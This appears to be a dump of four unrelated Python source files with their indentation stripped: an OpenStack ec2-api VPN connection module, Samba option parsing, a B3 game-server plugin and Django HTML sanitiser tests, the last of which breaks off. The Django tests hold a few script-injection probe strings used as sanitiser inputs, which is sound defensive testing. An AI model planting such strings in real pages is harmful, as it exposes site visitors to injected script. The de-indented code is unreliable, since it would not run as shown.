# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import string
from lxml import etree
import netaddr
from neutronclient.common import exceptions as neutron_exception
from oslo_log import log as logging
import six
from ec2api.api import common
from ec2api.api import ec2utils
from ec2api import clients
from ec2api.db import api as db_api
from ec2api import exception
from ec2api.i18n import _
LOG = logging.getLogger(__name__)
"""VPN connections related API implementation
"""
Validator = common.Validator
SHARED_KEY_CHARS = string.ascii_letters + '_.' + string.digits
AWS_MSS = 1387
MTU_MSS_DELTA = 40 # 20 byte IP and 20 byte TCP headers
def create_vpn_connection(context, customer_gateway_id, vpn_gateway_id,
type, options=None):
if not options or options.get('static_routes_only') is not True:
raise exception.Unsupported('BGP dynamic routing is unsupported')
customer_gateway = ec2utils.get_db_item(context, customer_gateway_id)
vpn_gateway = ec2utils.get_db_item(context, vpn_gateway_id)
vpn_connection = next(
(vpn for vpn in db_api.get_items(context, 'vpn')
if vpn['customer_gateway_id'] == customer_gateway_id),
None)
if vpn_connection:
if vpn_connection['vpn_gateway_id'] == vpn_gateway_id:
ec2_vpn_connections = describe_vpn_connections(
context, vpn_connection_id=[vpn_connection['id']])
return {
'vpnConnection': ec2_vpn_connections['vpnConnectionSet'][0]}
else:
raise exception.InvalidCustomerGatewayDuplicateIpAddress()
neutron = clients.neutron(context)
with common.OnCrashCleaner() as cleaner:
os_ikepolicy = {'ike_version': 'v1',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'pfs': 'group2',
'phase1_negotiation_mode': 'main',
'lifetime': {'units': 'seconds',
'value': 28800}}
os_ikepolicy = neutron.create_ikepolicy(
{'ikepolicy': os_ikepolicy})['ikepolicy']
cleaner.addCleanup(neutron.delete_ikepolicy, os_ikepolicy['id'])
os_ipsecpolicy = {'transform_protocol': 'esp',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-128',
'pfs': 'group2',
'encapsulation_mode': 'tunnel',
'lifetime': {'units': 'seconds',
'value': 3600}}
os_ipsecpolicy = neutron.create_ipsecpolicy(
{'ipsecpolicy': os_ipsecpolicy})['ipsecpolicy']
cleaner.addCleanup(neutron.delete_ipsecpolicy, os_ipsecpolicy['id'])
psk = ''.join(random.choice(SHARED_KEY_CHARS) for _x in range(32))
vpn_connection = db_api.add_item(
context, 'vpn',
{'customer_gateway_id': customer_gateway['id'],
'vpn_gateway_id': vpn_gateway['id'],
'pre_shared_key': psk,
'os_ikepolicy_id': os_ikepolicy['id'],
'os_ipsecpolicy_id': os_ipsecpolicy['id'],
'cidrs': [],
'os_ipsec_site_connections': {}})
cleaner.addCleanup(db_api.delete_item, context, vpn_connection['id'])
neutron.update_ikepolicy(
os_ikepolicy['id'], {'ikepolicy': {'name': vpn_connection['id']}})
neutron.update_ipsecpolicy(
os_ipsecpolicy['id'],
{'ipsecpolicy': {'name': vpn_connection['id']}})
_reset_vpn_connections(context, neutron, cleaner,
vpn_gateway, vpn_connections=[vpn_connection])
ec2_vpn_connections = describe_vpn_connections(
context, vpn_connection_id=[vpn_connection['id']])
return {
'vpnConnection': ec2_vpn_connections['vpnConnectionSet'][0]}
def create_vpn_connection_route(context, vpn_connection_id,
destination_cidr_block):
vpn_connection = ec2utils.get_db_item(context, vpn_connection_id)
if destination_cidr_block in vpn_connection['cidrs']:
return True
neutron = clients.neutron(context)
vpn_gateway = db_api.get_item_by_id(context,
vpn_connection['vpn_gateway_id'])
with common.OnCrashCleaner() as cleaner:
_add_cidr_to_vpn_connection_item(context, vpn_connection,
destination_cidr_block)
cleaner.addCleanup(_remove_cidr_from_vpn_connection_item,
context, vpn_connection, destination_cidr_block)
_reset_vpn_connections(context, neutron, cleaner,
vpn_gateway, vpn_connections=[vpn_connection])
return True
def delete_vpn_connection_route(context, vpn_connection_id,
destination_cidr_block):
vpn_connection = ec2utils.get_db_item(context, vpn_connection_id)
if destination_cidr_block not in vpn_connection['cidrs']:
raise exception.InvalidRouteNotFound(
_('The specified route %(destination_cidr_block)s does not exist')
% {'destination_cidr_block': destination_cidr_block})
neutron = clients.neutron(context)
vpn_gateway = db_api.get_item_by_id(context,
vpn_connection['vpn_gateway_id'])
with common.OnCrashCleaner() as cleaner:
_remove_cidr_from_vpn_connection_item(context, vpn_connection,
destination_cidr_block)
cleaner.addCleanup(_add_cidr_to_vpn_connection_item,
context, vpn_connection, destination_cidr_block)
_reset_vpn_connections(context, neutron, cleaner,
vpn_gateway, vpn_connections=[vpn_connection])
return True
def delete_vpn_connection(context, vpn_connection_id):
vpn_connection = ec2utils.get_db_item(context, vpn_connection_id)
with common.OnCrashCleaner() as cleaner:
db_api.delete_item(context, vpn_connection['id'])
cleaner.addCleanup(db_api.restore_item, context, 'vpn', vpn_connection)
neutron = clients.neutron(context)
_stop_vpn_connection(neutron, vpn_connection)
try:
neutron.delete_ipsecpolicy(vpn_connection['os_ipsecpolicy_id'])
except neutron_exception.Conflict as ex:
LOG.warning('Failed to delete ipsecoplicy %(os_id)s during '
'deleting VPN connection %(id)s. Reason: %(reason)s',
{'id': vpn_connection['id'],
'os_id': vpn_connection['os_ipsecpolicy_id'],
'reason': ex.message})
except neutron_exception.NotFound:
pass
try:
neutron.delete_ikepolicy(vpn_connection['os_ikepolicy_id'])
except neutron_exception.Conflict as ex:
LOG.warning(
'Failed to delete ikepolicy %(os_id)s during deleting '
'VPN connection %(id)s. Reason: %(reason)s',
{'id': vpn_connection['id'],
'os_id': vpn_connection['os_ikepolicy_id'],
'reason': ex.message})
except neutron_exception.NotFound:
pass
return True
def describe_vpn_connections(context, vpn_connection_id=None, filter=None):
formatted_vpn_connections = VpnConnectionDescriber().describe(
context, ids=vpn_connection_id, filter=filter)
return {'vpnConnectionSet': formatted_vpn_connections}
class VpnConnectionDescriber(common.TaggableItemsDescriber,
common.NonOpenstackItemsDescriber):
KIND = 'vpn'
FILTER_MAP = {'customer-gateway-configuration': (
'customerGatewayConfiguration'),
'customer-gateway-id': 'customerGatewayId',
'state': 'state',
'option.static-routes-only': ('options', 'staticRoutesOnly'),
'route.destination-cidr-block': ['routes',
'destinationCidrBlock'],
'type': 'type',
'vpn-connection-id': 'vpnConnectionId',
'vpn-gateway-id': 'vpnGatewayId'}
def get_db_items(self):
self.customer_gateways = {
cgw['id']: cgw
for cgw in db_api.get_items(self.context, 'cgw')}
neutron = clients.neutron(self.context)
self.os_ikepolicies = {
ike['id']: ike
for ike in neutron.list_ikepolicies(
tenant_id=self.context.project_id)['ikepolicies']}
self.os_ipsecpolicies = {
ipsec['id']: ipsec
for ipsec in neutron.list_ipsecpolicies(
tenant_id=self.context.project_id)['ipsecpolicies']}
self.os_ipsec_site_connections = {
conn['id']: conn
for conn in neutron.list_ipsec_site_connections(
tenant_id=self.context.project_id)['ipsec_site_connections']}
self.external_ips = _get_vpn_gateways_external_ips(
self.context, neutron)
return super(VpnConnectionDescriber, self).get_db_items()
def format(self, vpn_connection):
return _format_vpn_connection(
vpn_connection, self.customer_gateways, self.os_ikepolicies,
self.os_ipsecpolicies, self.os_ipsec_site_connections,
self.external_ips)
def _format_vpn_connection(vpn_connection, customer_gateways, os_ikepolicies,
os_ipsecpolicies, os_ipsec_site_connections,
external_ips):
config_dict = _format_customer_config(
vpn_connection, customer_gateways, os_ikepolicies, os_ipsecpolicies,
os_ipsec_site_connections, external_ips)
config = ec2utils.dict_to_xml(config_dict, 'vpn_connection')
config.attrib['id'] = vpn_connection['id']
config_str = etree.tostring(config, xml_declaration=True, encoding='UTF-8',
pretty_print=True)
return {'vpnConnectionId': vpn_connection['id'],
'vpnGatewayId': vpn_connection['vpn_gateway_id'],
'customerGatewayId': vpn_connection['customer_gateway_id'],
'state': 'available',
'type': 'ipsec.1',
'routes': [{'destinationCidrBlock': cidr,
'state': 'available'}
for cidr in vpn_connection['cidrs']],
'vgwTelemetry': [],
'options': {'staticRoutesOnly': True},
'customerGatewayConfiguration': config_str}
def _format_customer_config(vpn_connection, customer_gateways, os_ikepolicies,
os_ipsecpolicies, os_ipsec_site_connections,
external_ips):
customer_gateway = customer_gateways[vpn_connection['customer_gateway_id']]
os_connections_ids = vpn_connection['os_ipsec_site_connections'].values()
if os_connections_ids:
os_ipsec_site_connection = next(
(os_ipsec_site_connections[conn_id]
for conn_id in os_connections_ids
if os_ipsec_site_connections.get(conn_id)),
None)
else:
os_ipsec_site_connection = None
# TODO(ft): figure out and add to the output tunnel internal addresses
config_dict = {
'customer_gateway_id': vpn_connection['customer_gateway_id'],
'vpn_gateway_id': vpn_connection['vpn_gateway_id'],
'vpn_connection_type': 'ipsec.1',
'vpn_connection_attributes': 'NoBGPVPNConnection',
'ipsec_tunnel': {
'customer_gateway': {
'tunnel_outside_address': {
'ip_address': (
os_ipsec_site_connection['peer_address']
if os_ipsec_site_connection else
customer_gateway['ip_address'])}},
'vpn_gateway': {
'tunnel_outside_address': {
'ip_address': external_ips.get(
vpn_connection['vpn_gateway_id'])}}},
}
os_ikepolicy = os_ikepolicies.get(vpn_connection['os_ikepolicy_id'])
if os_ikepolicy:
config_dict['ipsec_tunnel']['ike'] = {
'authentication_protocol': os_ikepolicy['auth_algorithm'],
'encryption_protocol': os_ikepolicy['encryption_algorithm'],
'lifetime': os_ikepolicy['lifetime']['value'],
'perfect_forward_secrecy': os_ikepolicy['pfs'],
'mode': os_ikepolicy['phase1_negotiation_mode'],
'pre_shared_key': (
os_ipsec_site_connection['psk']
if os_ipsec_site_connection else
vpn_connection['pre_shared_key']),
}
os_ipsecpolicy = os_ipsecpolicies.get(vpn_connection['os_ipsecpolicy_id'])
if os_ipsecpolicy:
config_dict['ipsec_tunnel']['ipsec'] = {
'protocol': os_ipsecpolicy['transform_protocol'],
'authentication_protocol': os_ipsecpolicy['auth_algorithm'],
'encryption_protocol': os_ipsecpolicy['encryption_algorithm'],
'lifetime': os_ipsecpolicy['lifetime']['value'],
'perfect_forward_secrecy': os_ipsecpolicy['pfs'],
'mode': os_ipsecpolicy['encapsulation_mode'],
'tcp_mss_adjustment': (
os_ipsec_site_connection['mtu'] - MTU_MSS_DELTA
if os_ipsec_site_connection else
AWS_MSS),
}
return config_dict
def _stop_vpn_connection(neutron, vpn_connection):
connection_ids = vpn_connection['os_ipsec_site_connections']
for os_connection_id in six.itervalues(connection_ids):
try:
neutron.delete_ipsec_site_connection(os_connection_id)
except neutron_exception.NotFound:
pass
def _stop_gateway_vpn_connections(context, neutron, cleaner, vpn_gateway):
def undo_vpn_connection(context, vpn_connection, connections_ids):
vpn_connection['os_ipsec_site_connections'] = connections_ids
db_api.update_item(context, vpn_connection)
for vpn_connection in db_api.get_items(context, 'vpn'):
if vpn_connection['vpn_gateway_id'] == vpn_gateway['id']:
_stop_vpn_connection(neutron, vpn_connection)
connection_ids = vpn_connection['os_ipsec_site_connections']
vpn_connection['os_ipsec_site_connections'] = {}
db_api.update_item(context, vpn_connection)
cleaner.addCleanup(undo_vpn_connection, context, vpn_connection,
connection_ids)
def _update_vpn_routes(context, neutron, cleaner, route_table, subnets):
vpn_gateway = ec2utils.get_attached_gateway(
context, route_table['vpc_id'], 'vgw')
if not vpn_gateway:
return
_reset_vpn_connections(context, neutron, cleaner, vpn_gateway,
route_tables=[route_table], subnets=subnets)
def _reset_vpn_connections(context, neutron, cleaner, vpn_gateway,
subnets=None, route_tables=None,
vpn_connections=None):
if not vpn_gateway['vpc_id']:
return
# TODO(ft): implement search filters in DB api
vpn_connections = (vpn_connections or
[vpn for vpn in db_api.get_items(context, 'vpn')
if vpn['vpn_gateway_id'] == vpn_gateway['id']])
if not vpn_connections:
return
subnets = (subnets or
[subnet for subnet in db_api.get_items(context, 'subnet')
if subnet['vpc_id'] == vpn_gateway['vpc_id']])
if not subnets:
return
vpc = db_api.get_item_by_id(context, vpn_gateway['vpc_id'])
customer_gateways = {cgw['id']: cgw
for cgw in db_api.get_items(context, 'cgw')}
route_tables = route_tables or db_api.get_items(context, 'rtb')
route_tables = {rtb['id']: rtb
for rtb in route_tables
if rtb['vpc_id'] == vpc['id']}
route_tables_cidrs = {}
for subnet in subnets:
route_table_id = subnet.get('route_table_id', vpc['route_table_id'])
if route_table_id not in route_tables_cidrs:
route_tables_cidrs[route_table_id] = (
_get_route_table_vpn_cidrs(route_tables[route_table_id],
vpn_gateway, vpn_connections))
cidrs = route_tables_cidrs[route_table_id]
for vpn_conn in vpn_connections:
if vpn_conn['id'] in cidrs:
_set_subnet_vpn(
context, neutron, cleaner, subnet, vpn_conn,
customer_gateways[vpn_conn['customer_gateway_id']],
cidrs[vpn_conn['id']])
else:
_delete_subnet_vpn(context, neutron, cleaner, subnet, vpn_conn)
def _set_subnet_vpn(context, neutron, cleaner, subnet, vpn_connection,
customer_gateway, cidrs):
subnets_connections = vpn_connection['os_ipsec_site_connections']
os_connection_id = subnets_connections.get(subnet['id'])
if os_connection_id:
# TODO(ft): restore original peer_cidrs on crash
neutron.update_ipsec_site_connection(
os_connection_id,
{'ipsec_site_connection': {'peer_cidrs': cidrs}})
else:
os_connection = {
'vpnservice_id': subnet['os_vpnservice_id'],
'ikepolicy_id': vpn_connection['os_ikepolicy_id'],
'ipsecpolicy_id': vpn_connection['os_ipsecpolicy_id'],
'peer_address': customer_gateway['ip_address'],
'peer_cidrs': cidrs,
'psk': vpn_connection['pre_shared_key'],
'name': '%s/%s' % (vpn_connection['id'], subnet['id']),
'peer_id': customer_gateway['ip_address'],
'mtu': AWS_MSS + MTU_MSS_DELTA,
'initiator': 'response-only',
}
os_connection = (neutron.create_ipsec_site_connection(
{'ipsec_site_connection': os_connection})
['ipsec_site_connection'])
cleaner.addCleanup(neutron.delete_ipsec_site_connection,
os_connection['id'])
_add_subnet_connection_to_vpn_connection_item(
context, vpn_connection, subnet['id'], os_connection['id'])
cleaner.addCleanup(_remove_subnet_connection_from_vpn_connection_item,
context, vpn_connection, subnet['id'])
def _delete_subnet_vpn(context, neutron, cleaner, subnet, vpn_connection):
subnets_connections = vpn_connection['os_ipsec_site_connections']
os_connection_id = subnets_connections.get(subnet['id'])
if not os_connection_id:
return
_remove_subnet_connection_from_vpn_connection_item(
context, vpn_connection, subnet['id'])
cleaner.addCleanup(_add_subnet_connection_to_vpn_connection_item,
context, vpn_connection, subnet['id'], os_connection_id)
try:
neutron.delete_ipsec_site_connection(os_connection_id)
except neutron_exception.NotFound:
pass
def _get_route_table_vpn_cidrs(route_table, vpn_gateway, vpn_connections):
static_cidrs = [route['destination_cidr_block']
for route in route_table['routes']
if route.get('gateway_id') == vpn_gateway['id']]
is_propagation_enabled = (
vpn_gateway['id'] in route_table.get('propagating_gateways', []))
vpn_cidrs = {}
for vpn in vpn_connections:
if is_propagation_enabled:
cidrs = list(set(static_cidrs + vpn['cidrs']))
else:
cidrs = static_cidrs
if cidrs:
vpn_cidrs[vpn['id']] = cidrs
return vpn_cidrs
def _get_vpn_gateways_external_ips(context, neutron):
vpcs = {vpc['id']: vpc
for vpc in db_api.get_items(context, 'vpc')}
external_ips = {}
routers = neutron.list_routers(
tenant_id=context.project_id)['routers']
for router in routers:
info = router['external_gateway_info']
if info:
for ip in info['external_fixed_ips']:
if netaddr.valid_ipv4(ip['ip_address']):
external_ips[router['id']] = ip['ip_address']
return {vgw['id']: external_ips.get(vpcs[vgw['vpc_id']]['os_id'])
for vgw in db_api.get_items(context, 'vgw')
if vgw['vpc_id']}
def _add_cidr_to_vpn_connection_item(context, vpn_connection, cidr):
vpn_connection['cidrs'].append(cidr)
db_api.update_item(context, vpn_connection)
def _remove_cidr_from_vpn_connection_item(context, vpn_connection, cidr):
vpn_connection['cidrs'].remove(cidr)
db_api.update_item(context, vpn_connection)
def _add_subnet_connection_to_vpn_connection_item(context, vpn_connection,
subnet_id, os_connection_id):
vpn_connection['os_ipsec_site_connections'][subnet_id] = os_connection_id
db_api.update_item(context, vpn_connection)
def _remove_subnet_connection_from_vpn_connection_item(context, vpn_connection,
subnet_id):
del vpn_connection['os_ipsec_site_connections'][subnet_id]
db_api.update_item(context, vpn_connection)
| stackforge/ec2-api | ec2api/api/vpn_connection.py | Python | apache-2.0 | 21,863 |
# Samba-specific bits for optparse
# Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Support for parsing Samba-related command-line options."""
__docformat__ = "restructuredText"
import optparse
import os
from samba.credentials import (
Credentials,
AUTO_USE_KERBEROS,
DONT_USE_KERBEROS,
MUST_USE_KERBEROS,
)
from samba.hostconfig import Hostconfig
import sys
class SambaOptions(optparse.OptionGroup):
"""General Samba-related command line options."""
def __init__(self, parser):
from samba.param import LoadParm
optparse.OptionGroup.__init__(self, parser, "Samba Common Options")
self.add_option("-s", "--configfile", action="callback",
type=str, metavar="FILE", help="Configuration file",
callback=self._load_configfile)
self.add_option("-d", "--debuglevel", action="callback",
type=int, metavar="DEBUGLEVEL", help="debug level",
callback=self._set_debuglevel)
self.add_option("--option", action="callback",
type=str, metavar="OPTION",
help="set smb.conf option from command line",
callback=self._set_option)
self.add_option("--realm", action="callback",
type=str, metavar="REALM", help="set the realm name",
callback=self._set_realm)
self._configfile = None
self._lp = LoadParm()
self.realm = None
def get_loadparm_path(self):
"""Return path to the smb.conf file specified on the command line."""
return self._configfile
def _load_configfile(self, option, opt_str, arg, parser):
self._configfile = arg
def _set_debuglevel(self, option, opt_str, arg, parser):
if arg < 0:
raise optparse.OptionValueError("invalid %s option value: %s" %
(opt_str, arg))
self._lp.set('debug level', str(arg))
def _set_realm(self, option, opt_str, arg, parser):
self._lp.set('realm', arg)
self.realm = arg
def _set_option(self, option, opt_str, arg, parser):
if arg.find('=') == -1:
raise optparse.OptionValueError(
"--option option takes a 'a=b' argument")
a = arg.split('=')
try:
self._lp.set(a[0], a[1])
except Exception, e:
raise optparse.OptionValueError(
"invalid --option option value %r: %s" % (arg, e))
def get_loadparm(self):
"""Return loadparm object with data specified on the command line."""
if self._configfile is not None:
self._lp.load(self._configfile)
elif os.getenv("SMB_CONF_PATH") is not None:
self._lp.load(os.getenv("SMB_CONF_PATH"))
else:
self._lp.load_default()
return self._lp
def get_hostconfig(self):
return Hostconfig(self.get_loadparm())
class VersionOptions(optparse.OptionGroup):
"""Command line option for printing Samba version."""
def __init__(self, parser):
optparse.OptionGroup.__init__(self, parser, "Version Options")
self.add_option("-V", "--version", action="callback",
callback=self._display_version,
help="Display version number")
def _display_version(self, option, opt_str, arg, parser):
import samba
print samba.version
sys.exit(0)
def parse_kerberos_arg(arg, opt_str):
if arg.lower() in ["yes", 'true', '1']:
return MUST_USE_KERBEROS
elif arg.lower() in ["no", 'false', '0']:
return DONT_USE_KERBEROS
elif arg.lower() in ["auto"]:
return AUTO_USE_KERBEROS
else:
raise optparse.OptionValueError("invalid %s option value: %s" %
(opt_str, arg))
class CredentialsOptions(optparse.OptionGroup):
"""Command line options for specifying credentials."""
def __init__(self, parser):
self.no_pass = True
self.ipaddress = None
optparse.OptionGroup.__init__(self, parser, "Credentials Options")
self.add_option("--simple-bind-dn", metavar="DN", action="callback",
callback=self._set_simple_bind_dn, type=str,
help="DN to use for a simple bind")
self.add_option("--password", metavar="PASSWORD", action="callback",
help="Password", type=str, callback=self._set_password)
self.add_option("-U", "--username", metavar="USERNAME",
action="callback", type=str,
help="Username", callback=self._parse_username)
self.add_option("-W", "--workgroup", metavar="WORKGROUP",
action="callback", type=str,
help="Workgroup", callback=self._parse_workgroup)
self.add_option("-N", "--no-pass", action="store_true",
help="Don't ask for a password")
self.add_option("-k", "--kerberos", metavar="KERBEROS",
action="callback", type=str,
help="Use Kerberos", callback=self._set_kerberos)
self.add_option("", "--ipaddress", metavar="IPADDRESS",
action="callback", type=str,
help="IP address of server",
callback=self._set_ipaddress)
self.creds = Credentials()
def _parse_username(self, option, opt_str, arg, parser):
self.creds.parse_string(arg)
def _parse_workgroup(self, option, opt_str, arg, parser):
self.creds.set_domain(arg)
def _set_password(self, option, opt_str, arg, parser):
self.creds.set_password(arg)
self.no_pass = False
def _set_ipaddress(self, option, opt_str, arg, parser):
self.ipaddress = arg
def _set_kerberos(self, option, opt_str, arg, parser):
self.creds.set_kerberos_state(parse_kerberos_arg(arg, opt_str))
def _set_simple_bind_dn(self, option, opt_str, arg, parser):
self.creds.set_bind_dn(arg)
def get_credentials(self, lp, fallback_machine=False):
"""Obtain the credentials set on the command-line.
:param lp: Loadparm object to use.
:return: Credentials object
"""
self.creds.guess(lp)
if self.no_pass:
self.creds.set_cmdline_callbacks()
# possibly fallback to using the machine account, if we have
# access to the secrets db
if fallback_machine and not self.creds.authentication_requested():
try:
self.creds.set_machine_account(lp)
except Exception:
pass
return self.creds
class CredentialsOptionsDouble(CredentialsOptions):
"""Command line options for specifying credentials of two servers."""
def __init__(self, parser):
CredentialsOptions.__init__(self, parser)
self.no_pass2 = True
self.add_option("--simple-bind-dn2", metavar="DN2", action="callback",
callback=self._set_simple_bind_dn2, type=str,
help="DN to use for a simple bind")
self.add_option("--password2", metavar="PASSWORD2", action="callback",
help="Password", type=str,
callback=self._set_password2)
self.add_option("--username2", metavar="USERNAME2",
action="callback", type=str,
help="Username for second server",
callback=self._parse_username2)
self.add_option("--workgroup2", metavar="WORKGROUP2",
action="callback", type=str,
help="Workgroup for second server",
callback=self._parse_workgroup2)
self.add_option("--no-pass2", action="store_true",
help="Don't ask for a password for the second server")
self.add_option("--kerberos2", metavar="KERBEROS2",
action="callback", type=str,
help="Use Kerberos", callback=self._set_kerberos2)
self.creds2 = Credentials()
def _parse_username2(self, option, opt_str, arg, parser):
self.creds2.parse_string(arg)
def _parse_workgroup2(self, option, opt_str, arg, parser):
self.creds2.set_domain(arg)
def _set_password2(self, option, opt_str, arg, parser):
self.creds2.set_password(arg)
self.no_pass2 = False
def _set_kerberos2(self, option, opt_str, arg, parser):
self.creds2.set_kerberos_state(parse_kerberos_arg(arg, opt_str))
def _set_simple_bind_dn2(self, option, opt_str, arg, parser):
self.creds2.set_bind_dn(arg)
def get_credentials2(self, lp, guess=True):
"""Obtain the credentials set on the command-line.
:param lp: Loadparm object to use.
:param guess: Try guess Credentials from environment
:return: Credentials object
"""
if guess:
self.creds2.guess(lp)
elif not self.creds2.get_username():
self.creds2.set_anonymous()
if self.no_pass2:
self.creds2.set_cmdline_callbacks()
return self.creds2
| yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/samba/getopt.py | Python | mit | 9,947 |
#Team changer develop by pedrxd.
__version__ = '0.1'
__author__ = 'pedrxd'
import b3
import b3.events
import b3.plugin
import time
class TeamchangerPlugin(b3.plugin.Plugin):
requiresConfigFile = False
def setTeam(self, client, team):
self.console.write('forceteam %s %s' % (client.cid, team))
def onStartup (self):
self._adminPlugin = self.console.getPlugin('admin')
if not self._adminPlugin:
self.error('Could not find admin plugin')
return
self._adminPlugin.registerCommand(self, 'red', 40, self.red)
self._adminPlugin.registerCommand(self, 'blue', 40, self.blue)
self._adminPlugin.registerCommand(self, 'spec', 40, self.spec)
self._adminPlugin.registerCommand(self, 'replay', 40, self.replay, 'rp')
self._adminPlugin.registerCommand(self, 'auto', 40, self.auto)
def red(self, data, client, cmd):
"""Change a player team"""
if data:
sclient = self._adminPlugin.findClientPrompt(data, client)
if not sclient: return
else:
sclient = client
self.setTeam(sclient, 'red')
sclient.message('Moved to red team')
def blue(self, data, client, cmd):
"""Change a player team"""
if data:
sclient = self._adminPlugin.findClientPrompt(data, client)
if not sclient: return
else:
sclient = client
self.setTeam(sclient, 'blue')
sclient.message('Moved to blue team')
def spec(self, data, client, cmd):
"""Change a player team"""
if data:
sclient = self._adminPlugin.findClientPrompt(data, client)
if not sclient: return
else:
sclient = client
self.setTeam(sclient, 'spectator')
sclient.message('Moved to spec')
def replay(self, data, client, cmd):
"""Change to spec then rejoin to a team"""
if data:
sclient = self._adminPlugin.findClientPrompt(data, client)
if not sclient: return
else:
sclient = client
lastteam = sclient.team
self.setTeam(sclient, 'spectator')
self.setTeam(sclient, 'free')
sclient.message('Replay correctly')
def auto(self, data, client, cmd):
if data:
sclient = self._adminPlugin.findClientPrompt(data, client)
if not sclient: return
else:
sclient = client
self.setTeam(sclient, 'free')
sclient.message('Correctly AutoJoin')
| pedrxd/TeamChanger-b3 | extplugins/teamchanger.py | Python | gpl-3.0 | 2,557 |
import os
from datetime import datetime
from django.test import SimpleTestCase
from django.utils import html, safestring
from django.utils.encoding import force_text
from django.utils.functional import lazystr
class TestUtilsHtml(SimpleTestCase):
def check_output(self, function, value, output=None):
"""
function(value) equals output. If output is None, function(value)
equals value.
"""
if output is None:
output = value
self.assertEqual(function(value), output)
def test_escape(self):
f = html.escape
items = (
('&', '&'),
('<', '<'),
('>', '>'),
('"', '"'),
("'", '''),
)
# Substitution patterns for testing the above items.
patterns = ("%s", "asdf%sfdsa", "%s1", "1%sb")
for value, output in items:
for pattern in patterns:
self.check_output(f, pattern % value, pattern % output)
self.check_output(f, lazystr(pattern % value), pattern % output)
# Check repeated values.
self.check_output(f, value * 2, output * 2)
# Verify it doesn't double replace &.
self.check_output(f, '<&', '<&')
def test_format_html(self):
self.assertEqual(
html.format_html("{} {} {third} {fourth}",
"< Dangerous >",
html.mark_safe("<b>safe</b>"),
third="< dangerous again",
fourth=html.mark_safe("<i>safe again</i>")
),
"< Dangerous > <b>safe</b> < dangerous again <i>safe again</i>"
)
def test_linebreaks(self):
f = html.linebreaks
items = (
("para1\n\npara2\r\rpara3", "<p>para1</p>\n\n<p>para2</p>\n\n<p>para3</p>"),
("para1\nsub1\rsub2\n\npara2", "<p>para1<br />sub1<br />sub2</p>\n\n<p>para2</p>"),
("para1\r\n\r\npara2\rsub1\r\rpara4", "<p>para1</p>\n\n<p>para2<br />sub1</p>\n\n<p>para4</p>"),
("para1\tmore\n\npara2", "<p>para1\tmore</p>\n\n<p>para2</p>"),
)
for value, output in items:
self.check_output(f, value, output)
self.check_output(f, lazystr(value), output)
def test_strip_tags(self):
f = html.strip_tags
items = (
('<p>See: 'é is an apostrophe followed by e acute</p>',
'See: 'é is an apostrophe followed by e acute'),
('<adf>a', 'a'),
('</adf>a', 'a'),
('<asdf><asdf>e', 'e'),
('hi, <f x', 'hi, <f x'),
('234<235, right?', '234<235, right?'),
('a4<a5 right?', 'a4<a5 right?'),
('b7>b2!', 'b7>b2!'),
('</fe', '</fe'),
('<x>b<y>', 'b'),
('a<p onclick="alert(\'<test>\')">b</p>c', 'abc'),
('a<p a >b</p>c', 'abc'),
('d<a:b c:d>e</p>f', 'def'),
('<strong>foo</strong><a href="http://example.com">bar</a>', 'foobar'),
# caused infinite loop on Pythons not patched with
# http://bugs.python.org/issue20288
('&gotcha&#;<>', '&gotcha&#;<>'),
)
for value, output in items:
self.check_output(f, value, output)
self.check_output(f, lazystr(value), output)
# Some convoluted syntax for which parsing may differ between python versions
output = html.strip_tags('<sc<!-- -->ript>test<<!-- -->/script>')
self.assertNotIn('<script>', output)
self.assertIn('test', output)
output = html.strip_tags('<script>alert()</script>&h')
self.assertNotIn('<script>', output)
self.assertIn('alert()', output)
# Test with more lengthy content (also catching performance regressions)
for filename in ('strip_tags1.html', 'strip_tags2.txt'):
path = os.path.join(os.path.dirname(__file__), 'files', filename)
with open(path, 'r') as fp:
content = force_text(fp.read())
start = datetime.now()
stripped = html.strip_tags(content)
elapsed = datetime.now() - start
self.assertEqual(elapsed.seconds, 0)
self.assertIn("Please try again.", stripped)
self.assertNotIn('<', stripped)
def test_strip_spaces_between_tags(self):
f = html.strip_spaces_between_tags
# Strings that should come out untouched.
items = (' <adf>', '<adf> ', ' </adf> ', ' <f> x</f>')
for value in items:
self.check_output(f, value)
self.check_output(f, lazystr(value))
# Strings that have spaces to strip.
items = (
('<d> </d>', '<d></d>'),
('<p>hello </p>\n<p> world</p>', '<p>hello </p><p> world</p>'),
('\n<p>\t</p>\n<p> </p>\n', '\n<p></p><p></p>\n'),
)
for value, output in items:
self.check_output(f, value, output)
self.check_output(f, lazystr(value), output)
def test_escapejs(self):
f = html.escapejs
items = (
('"double quotes" and \'single quotes\'', '\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027'),
(r'\ : backslashes, too', '\\u005C : backslashes, too'),
(
'and lots of whitespace: \r\n\t\v\f\b',
'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008'
),
(r'<script>and this</script>', '\\u003Cscript\\u003Eand this\\u003C/script\\u003E'),
(
'paragraph separator:\u2029and line separator:\u2028',
'paragraph separator:\\u2029and line separator:\\u2028'
),
)
for value, output in items:
self.check_output(f, value, output)
self.check_output(f, lazystr(value), output)
def test_smart_urlquote(self):
quote = html.smart_urlquote
# IDNs are properly quoted
self.assertEqual(quote('http://öäü.com/'), 'http://xn--4ca9at.com/')
self.assertEqual(quote('http://öäü.com/öäü/'), 'http://xn--4ca9at.com/%C3%B6%C3%A4%C3%BC/')
# Everything unsafe is quoted, !*'();:@&=+$,/?#[]~ is considered safe as per RFC
self.assertEqual(quote('http://example.com/path/öäü/'), 'http://example.com/path/%C3%B6%C3%A4%C3%BC/')
self.assertEqual(quote('http://example.com/%C3%B6/ä/'), 'http://example.com/%C3%B6/%C3%A4/')
self.assertEqual(quote('http://example.com/?x=1&y=2+3&z='), 'http://example.com/?x=1&y=2+3&z=')
